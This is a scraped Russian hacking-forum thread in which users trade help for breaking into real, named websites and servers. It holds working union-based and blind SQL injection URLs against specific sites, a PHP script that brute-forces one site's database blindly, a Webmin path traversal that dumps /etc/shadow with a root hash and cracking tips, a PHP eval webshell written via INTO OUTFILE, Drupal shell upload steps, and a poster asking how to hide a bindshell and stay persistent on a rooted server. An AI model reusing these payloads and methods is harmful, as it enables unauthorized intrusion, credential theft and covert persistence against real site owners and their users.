vot naprimer

http://www.uptc.ru/show_id.php?id=-9+union+select+1,2,3,4,5,6,7+from+users/*

zdes est 4,5 koqda etu ne videmsya a kak uznat columns name v kakom nomere??

LokbatanLi
Меня поражает ваше упорство задавать такие дурацкие вопросы...вы вообще читаете что вам люди отвечают и рекомендуют? если вы не считаете нужным следовать советам участникам форума, то зачем же тогда спрашивать?или вам всю статью про скули и раскрутку их суда переписать? Вы случаем не ошиблись? видимо из вас не то что хакера..ламера нормального не получится...
З.Ы. Прошу модеров не считать мои высказывания за флуд !

vot naprimer

http://www.uptc.ru/show_id.php?id=-9+union+select+1,2,3,4,5,6,7+from+users/*

zdes est 4,5 koqda etu ne videmsya a kak uznat columns name v kakom nomere??

Не совсем тебя понял, но попытаюсь предположить:

Выводимые поля: 4,5.

Вместо любого из них поставляем version(). Запрос принимает вид:
http://www.uptc.ru/show_id.php?id=-9+union+select+1,2,3,version(),5,6,7/*

Если версия 5, значит нам доступна information_schema, tables и columns соответственно.

Опять видоизменяем запрос. Допустим, нужно увидеть имя первой таблицы. Тогда:

http://www.uptc.ru/show_id.php?id=-9+union+select+1,2,3,4,table_name,6,7+from+informa tion_schema.tables/*

Чтобы увидеть остальные - используем LIMIT, group_concat и иже с ними. Как именно - ищем на этом форуме, всё подробно описано.

Далее - хотим узнать имя колонки. Делаем запрос:

http://www.uptc.ru/show_id.php?id=-9+union+select+1,2,3,column_name,5,6,7+from+inform ation_schema.columns/*

Нужную перебираем тем же способом, что и имена таблиц.


Я тебя правильно понял, или всё ещё нет?

offf blin zdes est nomerki 4,5 a esli bi ix ne bival 4to zdelali?? kak mojem uznat v kakom nomere sidyat columns name

LokbatanLi ну ты ёпрст задолбал уже..нет вывода ..значит крути как слепую...я тебе же написал выше...
З.Ы. В таджикистоне тоже каникулы?

Вот рабочий пример для твоей ссылки:
http://www.uptc.ru/show_id.php?id=-9+union+select+1,2,3,4,group_concat(0x20,column_na me),6,7+from+information_schema.columns+where+tabl e_name=0x7573657273/*

Вывод колонок из таблицы "users' (0x7573657273 - имя таблицы в hex).

Gorev, nu pocti ti menya i ya tebya ponel kak blind sql budet??

Gorev, nu pocti ti menya i ya tebya ponel kak blind sql budet??

Blind-injection рассмотрена в статье, ссылку на которую я давал несколькими постами выше.

Подскажите,запускаю локал рут сплойт на шеле пишет
No job control on this shell
Система Debian Linux yesclub 2.6.18-6-686. Cплойт собран на OpenSuse 11,причём её он с радостью порутал =)
В чём трабла?
P.s. я понимаю,что не хочет работать на этом шеле,вопрос почему?
P.S.S. Уффф,порутал. =)
Зыыы Посоветуйте свежий паблик (можно и не паблик =)) руткит под Linx Debian с сцылкой желательно и выложите,если у кого есть, ваниш собранный,никак не хочет компилиься. =( С меня репа =)

кто либо пользовался этим эксплойтом http://milw0rm.com/exploits/7581 ?
(FreeBSD 6x/7 protosw kernel Local Privledge Escalation Exploit)
написано запускать так: usage: ./x <allproc>\n
что за параметр allproc?

Null байт не действует при аплоаде в систему виндувс? (php)

В функциях copy() и move_uploaded_file() null-байт работает, если же он экранируется, то можно воспользоваться тем, что php проводит нормализацию пути и обрезает значение по превышении MAXPATHLEN:
On Windows OS move_uploaded_file function will convert "foo.php"
followed by one or more of the chars \x2E (.), \x2F (/), \x5C (\)
back to "foo.php"

Не знаю, тут ли постю. Если что - прошу прощения. Ранее получал доступ в админку по линку http://192.168.0.1. В логин или пароль (1' or 1=1/*) и получил права. Спалили, поменяли. Поставил админ WEBMIN. Приконектився к 10000 порту. Скуль не проходит. Нарыл такую вот штукуhttp://192.168.0.1:10000/unauthenticated/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/etc/passwd показывает это (урывок): root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin

И такую: http://192.168.0.1:10000/unauthenticated/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/..%01/etc/shadow Показывает такое (урывок):
root:$1$8HEzo141$IVXTh333KnXkPgNHjr3MP.:14547:0:99 999:7:::
bin:*:14346:0:99999:7:::
daemon:*:14346:0:99999:7:::
adm:*:14346:0:99999:7:::
lp:*:14346:0:99999:7:::
sync:*:14346:0:99999:7:::
shutdown:*:14346:0:99999:7:::
halt:*:14346:0:99999:7:::
mail:*:14346:0:99999:7:::
news:*:14346:0:99999:7:::
uucp:*:14346:0:99999:7:::

Можно логин-пароль найти в этих данных?

Можно логин-пароль найти в этих данных?
->
root:$1$8HEzo141$IVXTh333KnXkPgNHjr3MP.:14547:0:99 999:7:::
Интересный, кстати говоря, случай.
Чтобы расшифровать пароля рута используй JohnTheRipper
--
Баг оказался древним
http://www.fduran.com/blog/webmin-vulnerability-exposing-your-password-or-any-file/

JohnTheRipper для *nix. Для винды тоже есть, только как им пользоваться ... просцу. Подскажите, что это за хеш? Какой алг его расшифровки. И где логин? ( Если туплю, сорри. Я не хакер, я просто бесплатного интернета хочу. Потому прошу помощи)

Нашел руководство по JohnTheRipper. Теперь проблема в другом.
JTR нужно кормить файлом с содержимым
root:6xp8Tw7//32x2:0:0:root:/:/bin/bash
А у меня содержимое в shadow
root:$1$8HEzo141$IVXTh333KnXkPgNHjr3MP.:14547:0:99 999:7:::
А в passwd:
root:x:0:0:root:/root:/bin/bash

Западло. Что делать?

Всем спасибо. Может кому пригодится: получил root скриптом <?php phpinfo() ?>
Админ продолжает сосать)))

Хеш: FreeBSD MD5
Логин: Root
На счёт алгоритма в google поищи.
------------
Просто скопируй root:$1$8HEzo141$IVXTh333KnXkPgNHjr3MP.:14547:0:99 999:7::: в файл shadow
и переберай джоником ./john shadow

Сорри, не пропустил последний пост :))

Подскажите пожалуста, возможно ли проснифать трафик хоста например 192.168.2.1 c машины с адресом 192.168.1.1 разделлённые маршрутизатороми, если хост 192.168.1.1 физически соединён только с маршрутизатором, и в ARP таблици только адрес этого маррутизатора?

Не, ну шутки шутками. Объясните мне пожалуйста, почему меня пустило в админку введением одного логина: root. Поле пароля пустое. Это недоработка webmina? Или я чтото сделал своими слабенькими манипуляциями?

А пароль вообще стоял?

Поглядел логи chkrootkit на порутаном серве и увидел
Bindshell infected (port 31337 (мой бинд)) , но я забиндил ещё один порт 31333 и он его почемуто не пропас,хотя в нетсат он ЛИСЕН. Работаю по второму порту.
Как закрыть забинденный мной порт и без палева закрепиться в системе при таких условиях?
И ещё,где в линухе лежит исторя команд и лог моих подключений на мои порты?
В var/log не нашёл =(

']если же он экранируется, то можно воспользоваться тем, что php проводит нормализацию пути и обрезает значение по превышении MAXPATHLEN
Можно поподробней о этом? (+ с примером если можно)
milw0rm.com/papers/359 - не знаю англ язык

(strtolower не должен влиять на Null байт по идее?)

Можно поподробней о этом? (+ с примером если можно)
milw0rm.com/papers/359 - не знаю англ язык

(strtolower не должен влиять на Null байт по идее?)

Почитай данную статью (http://forum.antichat.ru/thread98525-%ED%F3%EB%EB-%E1%E0%E9%F2%E0.html) . =)

Почитай данную статью (http://forum.antichat.ru/thread98525-%ED%F3%EB%EB-%E1%E0%E9%F2%E0.html) . =)
Что-то не получается заюзать (с точкой), нужен пример с POST'ом

(strtolower не должен влиять на Null байт по идее?)
а самому подумать?
в %00 - нет буквенных символов , чтоб переводить в нижний регистр

а самому подумать?
Увереность не помешает

короч нашел на одном интересном сайте как я понимаю инжект в скулю.дело в том что скульинж я плохо понимаю так как со скулью неработаю.вобщем посоветуте ЧТО и каким образом можно извлечь из вот такого варнинга:

« MODx Parse Error »MODx encountered the following error while attempting to parse the requested resource:
« Execution of a query to the database failed - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\\">%' OR sc.longtitle LIKE '%\\">\\'>sc\\">%' OR sc.description LIKE '%\\">\\'>' at line 1 »
SQL: SELECT DISTINCT sc.id, sc.pagetitle, sc.longtitle, sc.description FROM `uХХХХХХХ_main`.`ХХХ_site_content` sc LEFT JOIN `uХХХХХХ_main`.`ХХХ_site_tmplvar_contentv alues` stc ON sc.id = stc.contentid WHERE (sc.pagetitle LIKE '%\\">\\'>sc\\">%' OR sc.longtitle LIKE '%\\">\\'>sc\\">%' OR sc.description LIKE '%\\">\\'>sc\\">%' OR sc.content LIKE '%\\">\\'>sc\\">%' OR stc.value LIKE '%\\">\\'>sc\\">%') AND sc.privateweb=0 AND sc.published=1 AND sc.searchable=1 AND sc.deleted=0;


вводил в поле поиска - ">'>sc"><

']короч нашел на одном интересном сайте как я понимаю инжект в скулю.дело в том что скульинж я плохо понимаю так как со скулью неработаю.вобщем посоветуте ЧТО и каким образом можно извлечь из вот такого варнинга:

« MODx Parse Error »MODx encountered the following error while attempting to parse the requested resource:
« Execution of a query to the database failed - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\\">%' OR sc.longtitle LIKE '%\\">\\'>sc\\">%' OR sc.description LIKE '%\\">\\'>' at line 1 »
SQL: SELECT DISTINCT sc.id, sc.pagetitle, sc.longtitle, sc.description FROM `uХХХХХХХ_main`.`ХХХ_site_content` sc LEFT JOIN `uХХХХХХ_main`.`ХХХ_site_tmplvar_contentv alues` stc ON sc.id = stc.contentid WHERE (sc.pagetitle LIKE '%\\">\\'>sc\\">%' OR sc.longtitle LIKE '%\\">\\'>sc\\">%' OR sc.description LIKE '%\\">\\'>sc\\">%' OR sc.content LIKE '%\\">\\'>sc\\">%' OR stc.value LIKE '%\\">\\'>sc\\">%') AND sc.privateweb=0 AND sc.published=1 AND sc.searchable=1 AND sc.deleted=0;


вводил в поле поиска - ">'>sc"><
скуль, не? причем с кривым экранированием

скуль, не? причем с кривым экранированием

ну дак я про это и говорю - а толко че с этим далше делать - хз,я в скулях нерублю

']ну дак я про это и говорю - а толко че с этим далше делать - хз,я в скулях нерублю
читай маны ;)
например тут:http://forum.antichat.ru/thread19844.htmlили тут:http://forum.antichat.ru/thread43966.html

При обращении к файлу

http://localhost/blog/wp-includes/class-feed.php

имеем

Warning: require_once(ABSPATHWPINC/class-simplepie.php) [function.require-once]: failed to open stream: No such file or directory in T:\home\localhost\blog\wp-includes\class-feed.php on line 4

Fatal error: require_once() [function.require]: Failed opening required 'ABSPATHWPINC/class-simplepie.php' (include_path='.;/usr/local/PHP/PEAR;/usr/local/PHP/Smarty') in T:\home\localhost\blog\wp-includes\class-feed.php on line 4

Можно это как-то раскрутить, без параметра?

']короч нашел на одном интересном сайте как я понимаю инжект в скулю.дело в том что скульинж я плохо понимаю так как со скулью неработаю.вобщем посоветуте ЧТО и каким образом можно извлечь из вот такого варнинга:

« MODx Parse Error »MODx encountered the following error while attempting to parse the requested resource:
« Execution of a query to the database failed - You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\\">%' OR sc.longtitle LIKE '%\\">\\'>sc\\">%' OR sc.description LIKE '%\\">\\'>' at line 1 »
SQL: SELECT DISTINCT sc.id, sc.pagetitle, sc.longtitle, sc.description FROM `uХХХХХХХ_main`.`ХХХ_site_content` sc LEFT JOIN `uХХХХХХ_main`.`ХХХ_site_tmplvar_contentv alues` stc ON sc.id = stc.contentid WHERE (sc.pagetitle LIKE '%\\">\\'>sc\\">%' OR sc.longtitle LIKE '%\\">\\'>sc\\">%' OR sc.description LIKE '%\\">\\'>sc\\">%' OR sc.content LIKE '%\\">\\'>sc\\">%' OR stc.value LIKE '%\\">\\'>sc\\">%') AND sc.privateweb=0 AND sc.published=1 AND sc.searchable=1 AND sc.deleted=0;


вводил в поле поиска - ">'>sc"><

Тебе вот сюда (http://forum.antichat.ru/thread43966.html) . :)

Можно это как-то раскрутить, без параметра?
я думаю, что нет

Прошу помощи. Нашёл следующую скулю:
http://www.bmx.ru/files.php?id=1'

Подбираю поля. Дохожу до шести, используя в качестве комментария символ "--". Выходит следующее:
http://www.bmx.ru/files.php?id=1+union+select+1,1,1,1--

Не могу выполнить запрос! SELECT * FROM bmx_files WHERE razd_id = 1 union select 1,1,1,1-- ORDER BY id DESC

Пробую подобрать дальше, выскакивает другая ошибка:
Не могу выполнить запрос! SELECT * FROM bmx_razds_f WHERE id = 1 union select 1,1,1,1,1--

Это не операбельно, или у меня совсем мозг не работает уже?

Прошу помощи. Нашёл следующую скулю:
http://www.bmx.ru/files.php?id=1'

Подбираю поля. Дохожу до шести, используя в качестве комментария символ "--". Выходит следующее:
http://www.bmx.ru/files.php?id=1+union+select+1,1,1,1--



Пробую подобрать дальше, выскакивает другая ошибка:


Это не операбельно, или у меня совсем мозг не работает уже?

думаю ее просто нужно крутить как слепую

http://www.bmx.ru/files.php?id=1+and+1=1+--+

http://www.bmx.ru/files.php?id=1+and+1=0+--+

думаю ее просто нужно крутить как слепую

http://www.bmx.ru/files.php?id=1+and+1=1+--+

http://www.bmx.ru/files.php?id=1+and+1=0+--+

Я тоже об этом думал. Раз нет других вариантов - буду так. Большое спасибо!

keng
как вариант:
http://www.bmx.ru/foto.php?al_id=-17+union+select+1,2,concat_ws(0x3a,user(),version( ),database()),4,5,6--

keng
как вариант:
http://www.bmx.ru/foto.php?al_id=-17+union+select+1,2,concat_ws(0x3a,user(),version( ),database()),4,5,6--

Благодарю!

Есть сайт!есть админка.в поле login ввожу ковычку.выдаёт Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /usr/home/data/www/includes/functions_mysql.php on line 67.Что можно сделать?

Есть сайт!есть админка.в поле login ввожу ковычку.выдаёт Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /usr/home/data/www/includes/functions_mysql.php on line 67.Что можно сделать?

Можно почитать вот эту статью (http://forum.antichat.ru/thread43966.html). Конкретно - пункт 1.3. =)

вопрос довольно не обычный. Есть сайт, двиг самописный, все JS вещи реализованы при помощи jQUery. На главной странице есть див который каджые 10 секунд обновляется, т.е. происходит ajax запрос в базу, запрос возоврщает колличество записей и обновляется див с колличеством записей

Так вот проблема!!!! почему-то необъяснимым образом ИНОГДА вместо числа в этом диве отображается реклама хз откуда всявшаяся, на самом сайте нет рекламы ни какой и партнерки ни какие не подключены и траф не сливается ни куда.

то это за хрень может быть, код чистый проверяли много раз, где уязвимость, что уязвимо

Ап по посту #9830 (forum.antichat.ru/showpost.php?p=1646301&postcount=9830)

вопрос довольно не обычный. Есть сайт, двиг самописный, все JS вещи реализованы при помощи jQUery. На главной странице есть див который каджые 10 секунд обновляется, т.е. происходит ajax запрос в базу, запрос возоврщает колличество записей и обновляется див с колличеством записей

Так вот проблема!!!! почему-то необъяснимым образом ИНОГДА вместо числа в этом диве отображается реклама хз откуда всявшаяся, на самом сайте нет рекламы ни какой и партнерки ни какие не подключены и траф не сливается ни куда.

то это за хрень может быть, код чистый проверяли много раз, где уязвимость, что уязвимо
Мистика? :D
Пиши в асю. Щас не очень занят. Разберемся

Есть сайт!есть админка.в поле login ввожу ковычку.выдаёт Warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /usr/home/data/www/includes/functions_mysql.php on line 67.Что можно сделать?
Экранизируй кавычку.

вопрос довольно не обычный. Есть сайт, двиг самописный, все JS вещи реализованы при помощи jQUery. На главной странице есть див который каджые 10 секунд обновляется, т.е. происходит ajax запрос в базу, запрос возоврщает колличество записей и обновляется див с колличеством записей

Так вот проблема!!!! почему-то необъяснимым образом ИНОГДА вместо числа в этом диве отображается реклама хз откуда всявшаяся, на самом сайте нет рекламы ни какой и партнерки ни какие не подключены и траф не сливается ни куда.

то это за хрень может быть, код чистый проверяли много раз, где уязвимость, что уязвимо
Дак ты бы ссылку дал... тут надо глазами посмотреть...

то это за хрень может быть, код чистый проверяли много раз


ага, плохо проверял


Дак ты бы ссылку дал... тут надо глазами посмотреть...


тогда уж и шелл сразу, чтобы "проверить скрипты на наличие ифреймов и прочего"

Автор, сам не можешь - нанимай спеца, вот и весь разговор. Такие вещи в каждом случае прячутся очень индивидуально

open_basedir

php.ru/manual/features.safe-mode.html

google->open_basedir не работает move_uploaded_file

что можно сотрворить с сайтом жертвы, если на соседнем сайте(одинаковый ИП) найдена и раскручена уязвимость влоть до вида admin;pass Как можно используя доступ к соседу проникнуть на сайт исходной жертвы?

Залей шелл, и потом как уже твои права тебе позволят

ЗЫ в лучшем случаи - прочесть конфиг от БД где храниться пасс админа

подскажите, пожалуйста, как в drupal через админку можно шелл закинуть?

site.com/drupal/?q=node/1/edit
включить пхп в комментах.

включить пхп в комментах.
что то невидно там такой опции, стоит друпал 6.6

при создании коммента или правке поста, в расширяющемся меню,под формой для ввода текста,есть радиобаттоны. выставить на пхп.

Спасибо разобрался, все как говорил $n@ke, просто php код еще нужно обрамлять тегом <!--break-->, чтоб избежать преобразования спец-символов...

при создании коммента или правке поста, в расширяющемся меню,под формой для ввода текста,есть радиобаттоны. выставить на пхп.
я вижу у себя тут только Filtered HTML и Full HTML , может я всетаки что то упустил? o_O

я вижу у себя тут только Filtered HTML и Full HTML , может я всетаки что то упустил? o_O

бывает и такое) зайди в Administer › Site configuration › Input formats и в Add input format создай php, при этом убери все типы фильтров

Скиньте ктонить ссылку на сайт для конвертации в символов в CHAR(*), а то посеял где то все свои ссылки ((

http://home2.paulschou.net/tools/xlate/

Как быть? Точно знаю что одна строка! А когда пишу:
...php?id=-24+union+select+1--
выдает:
The used SELECT statements have a different number of columns
как быть в такой ситуации?

дать ссылку сюды

http://www.selo.kz/fspisok.php?id=-24+union+select+1--
Тока не ломай кайф плз если первее до админки доберешься, не показывай результат, просто покажи видимые поля, дальше я сам ))

Gemini12 я не искал но в указанном месте нет вывода ..так что крути как слепую..версия там 5.0.85-log

http://www.selo.kz/fspisok.php?id=24+AND+SUBSTRING((version()),1,1)=5--

http://www.selo.kz/fspisok.php?id=-24+union+select+1--
Тока не ломай кайф плз если первее до админки доберешься, не показывай результат, просто покажи видимые поля, дальше я сам ))
сплоит, он конечно кривоват, но работать должен:

<?php

#$chars="abcdef0123456789"; // для хеша
#$chars="_.\\][)(:;!@#$%^&*-+='\"<>?/,}~{ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmopqrstu vwxyz0123456789"; // для соли
$chars=".54367890012-ntlog"; // бд
$i=1;
$to=10;
$c=0;
$cc=0;
$data="";
$ebana="";
set_time_limit(0);

while($i<=$to) {

while($c<=strlen($chars)) {

echo $i.":".$chars[$c];
$sock=fsockopen("www.selo.kz", 80, $errno, $errstr, 5);
if(!$sock) die("hehe fuckin connect");
$ept="id=99999924+or+if(substring((select+version()),".$i.",1)=".$chars[$c].",(select+1+union+select+2),null)";
$h="POST /fspisok.php? HTTP/1.0\r\n";
$h.="Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, */*\r\n";
$h.="Content-Type: application/x-www-form-urlencoded\r\n";
$h.="User-Agent: Mozilla/4.0 (compatible; MSIE 5.5; Windows 98; DigExt)\r\n";
$h.="Host: www.selo.kz\r\n";
$h.="Content-Length: ".strlen($ept)."\r\n";
$h.="Cookie: bbsessionhash=636f59afa8e2b1a8519bbbf5669a48b6; bblastvisit=1242490434; bblastactivity=0\r\n\r\n";
$h.=$ept;
fwrite($sock, $h);
sleep(1);
$c++;
$data="";

while(!feof($sock)) {
$data=fgets($sock, 1024);
if(eregi("Subquery returns more than 1 row", $data)) { $cc=1; break; }
}

if($cc==1) { echo ":OKE!!1\r\n"; $ebana.=$chars[$c-1]; break; }
else echo ":FUCK!1\r\n";
fclose($sock);
}

$c=0;
$cc=0;
$i++;

}

echo $ebana;

?>

Aртем я думаю что для таких дел как раскрутка слепой скули есть много програм например сипт..кототрый поверь мне не настолько кривоват как твой скрипт..если конечно это твой скрипт

Хм... я часто сталкиваюсь с ситуациями, когда например нет возможности использовать, чужие например программы. Исходя из чего и приходится всё делать самому, что относительно положительно влияет на умственный потенциал.
А что касается программ, то для человека, который ИЗУЧАЕТ, например Blind SQL Inj, то ему просто напросто НЕОБХОДИМО всё делать в ручную. Потому, что не одна программа НЕИДЕАЛЬНА, в связи с чем могут возникать разные трудности в реализации инъекции, у человека, который бездумно использовал эти самые программы.

Хм... я часто сталкиваюсь с ситуациями, когда например нет возможности использовать, чужие например программы. Исходя из чего и приходится всё делать самому, что относительно положительно влияет на умственный потенциал.
А что касается программ, то для человека, который ИЗУЧАЕТ, например Blind SQL Inj, то ему просто напросто НЕОБХОДИМО всё делать в ручную. Потому, что не одна программа НЕИДЕАЛЬНА, в связи с чем могут возникать разные трудности в реализации инъекции, у человека, который бездумно использовал эти самые программы.


ну в ручную раскручивать слепую скулю я думаю будет необдуманно, когда есть сотни программ заточенный под это дело..насчет идеальных программ Вы правы...но в данной ситуации ваш скрипт намного уступает по функционалу тому же сипту...

ну в ручную раскручивать слепую скулю я думаю будет необдуманно, когда есть сотни программ заточенный под это дело..насчет идеальных программ Вы правы...но в данной ситуации ваш скрипт намного уступает по функционалу тому же сипту...
Соотношение время-качество играет весомую роль. Зачастую нет времени делать качественно. Но здесь важно не качество, а результат, чего-бы это не стоило. :)

Aртем
если писать,то писать то что может конкурировать со скриптами выложенными в этой (http://forum.antichat.ru/thread119047.html) теме,а не лишь бы писать, где на перебор 1-го символа (не хеша где a-f0-9) - уходит 8 запросов (я взял пример Грея),в нем находится середина диапазона chr(0)-chr(255),и проверяется на истинность в зависимости от ответа - циклично ,ну это так,к слову.детальней это все описал Qwazar опять же thread119047.html (http://forum.antichat.ru/thread119047.html)

L I G A и Pashkela, я не в коем случае не пытался написать универсальный скрипт для посимвольного перебора и уж тем более набиваться в конкуренты. Я просто написал сплоит для посимвольного перебора, непосредственно основывая работу исходя из поста #9868 (http://forum.antichat.ru/showpost.php?p=1656861&postcount=9868)

Возник такой вопрос
Есть сайт

http://www.cstrike.ro/cs_1.6_servers.php?start=190

Ошибку выдёт только в таком случаи

http://www.cstrike.ro/cs_1.6_servers.php?start=-190

А так не хочет

http://www.cstrike.ro/cs_1.6_servers.php?start=190'

т.е. там как я понял, такая фильтрация

$start = (int)$_GET['start'];

Реально ли раскрутить такую SQl inj , если это вообще SQL inj

...
т.е. там как я понял, такая фильтрация

$start = (int)$_GET['start'];

Реально ли раскрутить такую SQl inj , если это вообще SQL inj
чтобы включить мозг попробуй такой скрипт
<?php
echo ((int)$_GET['start']);
?>

ну и тесть))

если в MsSQL-inj нету вывода ошибки, то как можно такую БД раскрутить?

Byrger как слепую инъекцию http://forum.antichat.ru/thread43966-blind.html
Вопросик-на сайте открыт фтп по логину guest,залил в папку uploads шелл,но когда через http хочу его открыть,говорят мол нету такой папки,при фтп соединении видно всего пару папок,сам сайт невиден.

Byrger как слепую инъекцию http://forum.antichat.ru/thread43966-blind.html
Вопросик-на сайте открыт фтп по логину guest,залил в папку uploads шелл,но когда через http хочу его открыть,говорят мол нету такой папки,при фтп соединении видно всего пару папок,сам сайт невиден.

У меня Ms SQL а не MySQL

Вопросик-на сайте открыт фтп по логину guest,залил в папку uploads шелл,но когда через http хочу его открыть,говорят мол нету такой папки,при фтп соединении видно всего пару папок,сам сайт невиден.
ты сам ответил на свой вопрос)
У меня Ms SQL а не MySQL
всеравно как слепую, попробуй BSQL Hacker облегчит тебе раскрутку ... не руками ж крутить :D

если в MsSQL-inj нету вывода ошибки, то как можно такую БД раскрутить?
union select например

http://milw0rm.com/papers/279

[0x03] - MSSQL Blind SQL Injection Attack

ага тогда вот такой вопрос
есть ошибка в site.ru/news.php?page=-1

выводит
warning: mysql_num_rows(): supplied argument is not a valid MySQL result resource in /home/webhost/www/site/includes/common.inc(1685) : eval()'d code on line 13.

при вставке ковычкеу никакой ошибки не выдаёт и при 2-1 выдаёт первую страницу.
При and 1=2 тоже ошибку не выдаёт.

Как можно попробовать такое раскрутить?

ага тогда вот такой вопрос

ага, тогда у меня тоже вопрос, какие статьи ты прочитал, прежде чем задавать вопросы?

ага, тогда у меня тоже вопрос, какие статьи ты прочитал, прежде чем задавать вопросы?
Я много чего читал но не сталкивался с такой инъекцией
Она ещё в eval() помойму....

Я много чего читал но не сталкивался с такой инъекцией
Она ещё в eval() помойму....
Ну и чего ты ждёшь? Что-бы тебе переписали какую-нибудь статью сюда, или нужно применить телепатию и всех победить без линка?

Нужен словарь для брута таблиц и колонок СУБД MSACCESS ,пробовал для мускула-не одной таблы.
Заранее благодарен

Нужен словарь для брута таблиц и колонок СУБД MSACCESS ,пробовал для мускула-не одной таблы.
Заранее благодарен
прогони с префиксом tbl или tbl_

Byrger,
в.1 вырезается ' => and пройдет только в where => where lala=col_{inj} (col_2-1 true, col_-1 unknown column col_)
в.2 (более правдивый) из названия переменной inj в limit или offset, $page берется c intval()

нашел MSSQL inj . Дописываю к концу линка or 1=@@version-- и ничего не выводит, просто голый лист! Что делать?
П.С. ;select+@@version - тоже не катит...

П.П.С. Учитывая, что выводит это
Microsoft OLE DB Provider for SQL Server error '80040e14' Unclosed quotation mark before the character string '1', ')'. /scripts/UserStatistic.asp, line 26

jokester
Прогнал-ничего(

jokester
Прогнал-ничего(
Чиорт, а мне хакеры посоветовали так сделать :(
Обманули негодяи значит

Нет специальных словарей под разные базы, но я на 99% уверен, что там префикс, если у тебя нормальный словарь. Сам понимаешь, угадать его не получится. В СИПТе если не ошибаюсь, есть словарь префиксов

PS Хотя ... Вон l1ght гадает на картах и предсказывает будущее по фотографии :)

ау...люди ..помогите с моей проблемой тож))

нашел MSSQL inj . Дописываю к концу линка or 1=@@version-- и ничего не выводит, просто голый лист! Что делать?
П.С. ;select+@@version - тоже не катит...

П.П.С. Учитывая, что выводит это
Microsoft OLE DB Provider for SQL Server error '80040e14' Unclosed quotation mark before the character string '1', ')'. /scripts/UserStatistic.asp, line 26
Нынче головой думать не тру =\
1') or 1=@@version и закрой чем нить =\

ctacok,
я поробовал и не только такую комбинаци+еще раз прочел мануал от Кэша..ничего не выходит.
Вот ответ базы на твой запрос:
There are more columns in the INSERT statement than values specified in the VALUES clause. The number of values in the VALUES clause must match the number of columns specified in the INSERT statement.

ctacok,
я поробовал и не только такую комбинаци+еще раз прочел мануал от Кэша..ничего не выходит.
Вот ответ базы на твой запрос:
Здесь INSERT, так что читай ещё мануалы.

jecka3000 вставь:
@@version,1,1,1,1,1,1)+--+

Scipio, не катит
Microsoft OLE DB Provider for SQL Server error '80040e57'

String or binary data would be truncated.

/scripts/UserStatistic.asp, line 26

Ctacok, расскажи поподробнее, что означает insert и что прочесть?

давай ссылку тогда, просто @@version надо подставить в нестроковое поле

1',@@version,1,1,1,1)+--+

Scipio,кстати, а чтож тогда делать с information_schema?
1',=(SELECT+TOP+1+TABLE_NAME+FROM+INFORMATION_S CHEMA.TABLES)+--+ ?

хехе, не получится использовать подзапросы здесь

Scipio, ну посоветуй что нибудь, я вообще в такой ситуации первый раз, может быть мануал какой нить есть)

Всем привет.
Есть сервак со след параметрами

base:articles
ver:5.1.36-community
user:root@localhost
basedir:C:\Program Files\MySQL\MySQL Server 5.1\
datadir:C:\Documents and Settings\All Users\Application Data\MySQL\MySQL Server 5.1\Data\
os:Win32
mysql.password:****
mysql.user:****
tmpdir:C:\WINDOWS\TEMP
file_priv:Y

Собственно интересна возможность заливки шелла.
Если есть статьи какие нибудь про load_file- накидайте ссылок (я ничего толкового не нашел). И еще интересует возможность использования
mysql.password:****
mysql.user:****
Где и как можно узнать хост на котором БД.

Сорри, если что-то не так понял и неправильно написал.


Зы
-1' UNION SELECT 1,2,3,'<?php eval($_GET[‘e’]) ?>',5,6 INTO OUTFILE '1.php'; --
Остается только найти полный путь к корню сайта на сервере и дописать его перед 1.php.

Я так понимаю это вот этот путь C:\Documents and Settings\All Users\Application Data\MySQL\MySQL Server 5.1\Data\
?

Заранее спасибо. С меня +++ за помощь.

Где и как можно узнать хост на котором БД.


user:root@localhost
;)

Я так понимаю это вот этот путь C:\Documents and Settings\All Users\Application Data\MySQL\MySQL Server 5.1\Data\
?
Вроде он, но если я не ошибаюсь, его надо записать вот так: C:\\Documents and Settings\\All Users\\Application Data\\MySQL\\MySQL Server 5.1\\Data\\

;)
Ок
А как туда законектиться?
Скинь плиз где можно почитать, буду оч благодарен.

Через шелл )

Через шелл я знаю как )
Я думал может как по другому можно

http://webew.ru/articles/414.webew
Может поможет.

Вроде он, но если я не ошибаюсь, его надо записать вот так: C:\\Documents and Settings\\All Users\\Application Data\\MySQL\\MySQL Server 5.1\\Data\\
Но шелл зальётся при условии, что у тебя есть права на запись в Data.
О_о ;)

Через шелл я знаю как )
Я думал может как по другому можно

Можно, если разрешён удалённый коннект ;)

А можно поконкретнее или где почитать можно?
Спасибо.

А можно поконкретнее или где почитать можно?
Спасибо.
Ну а что подробней то? :) Если разрешён удалённый конект к БД, то можно подконектиться удалённо, заюзать к примеру скрипт от rst, да и навалом софта разного в инэте для этих целей (удалённого администрирования БД) ... но есть одно НО, чаще всего как раз таки удалённый конект отключен из соображений безопастности и так далее ...

не пойму что вы ему советуете? О_о
ему надо найти папку для записи доступную из веб и залить туда шелл
Вроде он, но если я не ошибаюсь, его надо записать вот так: C:\\Documents and Settings\\All Users\\Application Data\\MySQL\\MySQL Server 5.1\\Data\\
можно так, а можно одинарными простыми слэшами, но эта папка врядле доступна из веб ))))

не пойму что вы ему советуете? О_о
Ну а зачем тогда вмешиваешься, если не понимаешь о чём речь? :confused:

